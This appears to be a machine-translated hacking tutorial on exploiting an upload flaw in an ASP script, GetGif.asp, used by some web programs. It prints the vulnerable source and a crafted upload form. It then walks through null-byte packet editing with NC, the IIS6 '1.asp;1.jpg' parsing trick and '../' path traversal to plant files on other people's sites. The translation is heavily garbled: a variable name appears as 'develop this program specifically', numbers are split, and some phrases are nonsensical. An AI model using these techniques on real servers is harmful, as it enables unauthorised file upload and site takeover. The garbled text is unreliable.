Articles are written in simple point,but everyone should be able to understand! The existence of this vulnerability box program or a lot of! Real Madrid,mascot of what seems to have! First look at the vulnerability of specific file code,The file name is GetGif. asp CODE: <!--# include file="config. asp" - > <% Response. Buffer = True Server. ScriptTimeOut=1 8 0 'On Error Resume Next 'dim develop this program specifically ExtName = "jpg,gif,png" 'allow extension Develop this program specifically =imgFolder 'save path If Right(develop this program specifically,1)<>"/" Then develop this program specifically=develop this program specifically&"/" 'in the directory after the(/) CheckAndCreateFolder(Develop This Program Specifically) UpLoadAll_a = Request. TotalBytes 'to obtain the client all content If(UpLoadAll_a<=0) Then Response. Write "Sorry" Response. End end if Set UploadStream_c = Server. CreateObject("ADODB. Stream") UploadStream_c. Type = 1 UploadStream_c. Open UploadStream_c. The Write Request. BinaryRead(UpLoadAll_a) UploadStream_c. Position = 0 FormDataAll_d = UploadStream_c. Read CrLf_e = chrB(1 3)&chrB(1 0) FormStart_f = InStrB(FormDataAll_d,CrLf_e) FormEnd_g = InStrB(FormStart_f+1,FormDataAll_d,CrLf_e) Set FormStream_h = Server. Createobject("ADODB. Stream") FormStream_h. Type = 1 FormStream_h. Open UploadStream_c. Position = FormStart_f + 1 UploadStream_c. CopyTo FormStream_h,FormEnd_g-FormStart_f-3 FormStream_h. Position = 0 FormStream_h. Type = 2 FormStream_h. CharSet = "GB2312" FormStreamText_i = FormStream_h. Readtext FormStream_h. Close FileName_j = Mid(FormStreamText_i,InstrRev(FormStreamText_i,"\")+1,FormEnd_g) 'FileName_j = Mid(FormStreamText_i,InstrRev(FormStreamText_i,"=")+2,FormEnd_g) 'Response. Write FileName_j If(CheckFileExt(FileName_j,ExtName)) Then SaveFile = Server. MapPath(develop this program specifically & FileName_j) 'SaveFile=develop this program specifically & FileName_j If Err Then Response. Write "Sorry" Err. Clear Response. End Else SaveFile = CheckFileExists(SaveFile) k=Instrb(FormDataAll_d,CrLf_e&CrLf_e)+4 l=Instrb(k+1,FormDataAll_d,leftB(FormDataAll_d,FormStart_f-1))-k-2 FormStream_h. Type=1 FormStream_h. Open UploadStream_c. Position=k-1 UploadStream_c. CopyTo FormStream_h,l FormStream_h. SaveToFile SaveFile,2 SaveFileName = Mid(SaveFile,InstrRev(SaveFile,"\")+1) Response. write "OK" Response. End End If Else Response. Write "Sorry" Response. End End If %> <% 'Determine the file type is qualified Function CheckFileExt(FileName,ExtName) 'file name,allowed file upload types FileType = ExtName FileType = Split(FileType,",") For i = 0 To Ubound(FileType) If LCase(Right(FileName,3)) = LCase(FileType(i)) then CheckFileExt = True Exit Function Else CheckFileExt = False End if Next End Function 'Check the upload folder exists,not exists then create folder Function CheckAndCreateFolder(FolderName) fldr = Server. Mappath(FolderName) Set fso = CreateObject("Scripting. FileSystemObject") If Not fso. FolderExists(fldr) Then fso. CreateFolder(fldr) End If Set fso = Nothing End Function 'Check whether a file exists,rename the existing file Function CheckFileExists(FileName) Set fso=Server. CreateObject("Scripting. FileSystemObject") If fso. FileExists(SaveFile) Then i=1 msg=True Do While msg CheckFileExists = Replace(SaveFile,Right(SaveFile,4),"_" & i & Right(SaveFile,4)) If not fso. FileExists(CheckFileExists) Then msg=False End If i=i+1 Loop Else CheckFileExists = FileName End If Set fso=Nothing End Function %> It is also very simple a upload code,there are also upload vulnerability,reminds us of the DVBBS upload vulnerability,do-it-yourself write an HTML page is submitted CODE: <form action=http://www. xxx. com/getgif. asp method="post" enctype="multipart/form-data" name="form1"> <p> <input name="file" type="file" size="5 0"> </p> <p> <input type="submit" name="Submit" value="submit"> </p> </form>and then the capture,modification of the packet"2 0"-"0 0",NC upload it to this step do not understand friends can refer to DVBBS upload vulnerability The above method through the kill IIS5 and IIS6,there is a method is for IIS6 parsing vulnerability,you can upload a 1. asp;1. jpg files are also possible! In addition, there are a is for the path problem,because the default upload path is/img/ However,many box owners are taking this path to get rid of, as changed/img001/,what is more the directory setup is more complex For this case the solution is in the package to add the"../”,add the number of may not be one,if the box owner settings are BT then,you can submit multiple"../”, In the event of submission error,submitted before the file is uploaded to the website root directory! The specific circumstances also please specific analysis!